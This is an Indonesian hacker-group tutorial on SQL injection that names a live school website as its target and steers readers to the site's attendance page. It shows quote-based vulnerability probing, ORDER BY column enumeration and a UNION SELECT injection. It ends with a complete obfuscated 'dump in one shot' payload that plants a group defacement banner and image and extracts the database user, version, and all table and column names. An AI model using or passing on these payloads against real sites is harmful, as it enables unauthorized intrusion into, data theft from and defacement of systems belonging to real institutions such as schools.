Assalamualaikum Wr.wb
Kembali Lagi bersama gw Narumi X-ploit
Kali Ni Gw akan Kasih tutorial SQL HTML INJECTION
Sebelum itu Gw Minta izin dulu buat Mr.Kla Dan kurama untuk Up Materi Ini
Saya Izin ya mastahque✌
Oke langsung aja
Disini gw akan gunakan Target
http://sman75jkt.sch.id/
Itu live Targetnya
Ya Cari Aja errornya dimana Biasanya berada di Absensi
Oke langsung aja Kita Test vuln apa engga
caranya pake tanda (')
Ternyata Vuln Kenapa vuln?karna Tulisannya menghilang
Tidak Hanya Muncul MYSQL SYNTAX untuk Vuln SQL nya bisa juga kay tadi
oke kanjut
jika sudah Langsung ke order By
contoh
http://subangcyberxploit/absen11'+ order by 1--+-/ (Tidak Error)
http://subangcyberxploit/absen11'+ order by 2--+-/ (Tidak Error)
http://subangcyberxploit/absen11'+ order by 3--+-/ (Tidak Error)
dan disini akhirnya saya menemukan Errormya
errornya di angka 13
Oke lanjut ke union
http://subangcyberxploit/absen11' and 0 union all select 1,2,3,4,5,6,7,8,9,10,11,12--+-/
kek gitu dan hasilnya
Tara Hasilnya Berhasil
Selamat mencoba
Thank for
Mr.Klaa
Kurama-kun
DIOS YG GW GUNAKAN
concat/**kurma**/('<center>','<img src= "https://i.top4top.io/p_18250uwb03.jpg" height="200px" width="200px"','</center>','</br>','<font color="red" size="5">Kissed By Narumi Darknet</font>','</br>','</br>','<font color="black" size="5">@AngelsCyberMoon And Subang Cyber X-ploit</font>','</br>','<font color="red">User:: ',user(),'</br>','<font color="blue">Versi:: ','</font>',version(),'<br>','<font color="green">Database:: ','</font>',database(),'</br>','</br>',(select(@x)/*!from*/(/*!select*/(@x:=0x00),(select(0)/*!From*/(/*!information_schema.columns*/)/*!where*/(table_schema=database/**kurma**/())and(0x00)in(@x:=/*!coNcat*/%20(@x,0x3c62723e,/*!table_name*/,0x203a3a20,/*!column_name*/))))x))
#Angels Cyber moon
#Subang Cyber X-ploit
#Indonesian Death sec
#Thank To all My grup
See you
